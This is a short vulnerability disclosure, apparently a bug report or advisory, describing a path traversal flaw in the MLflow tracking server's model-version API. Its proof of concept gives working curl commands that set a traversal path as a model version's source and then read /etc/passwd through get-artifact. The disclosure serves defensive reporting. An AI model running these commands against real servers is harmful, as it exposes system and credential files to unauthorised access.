Description

By creating a model version through the REST API endpoint api/2.0/mlflow/registered-models/create and specifying a relative path redirection to the source argument, local server files can be accessed on the tracking server when a subsequent REST API v1.1 call is made to model-versions/get-artifact` and providing any path on the local file system.

Proof of Concept

Start an Mlflow server in default mode

mlflow server

Use the REST API to create a model

curl -X POST http://mlflowserver:5000/api/2.0/mlflow/registered-models/create -H "Content-type: application/json" -d '{"name": "AModel"}'

Use the REST API to create a model version by setting the source argument to a relative path (such as root) on the local file system
(note that this is not restricted to a uri scheme of ‘file://’ only. This also works with ‘http://’, ‘https://’, ‘runs:/’, ‘mlflow-artifacts:/’ and object store locations, provided that the host is not ‘localhost’ or ‘127.0.0.1’).

curl -X POST http://mlflowserver:5000/api/2.0/mlflow/model-versions/create -H "Content-type: application/json" -d '{"name": "AModel", "source": file://hostname/../../../../../../../}'

Retrieve the artifacts from the tracking server’s local filesystem

curl http://mlflowserver:5000/model-versions/get-artifact?path=etc/passwd&name=TestModel&version=1

This will return the file contents of the local password file.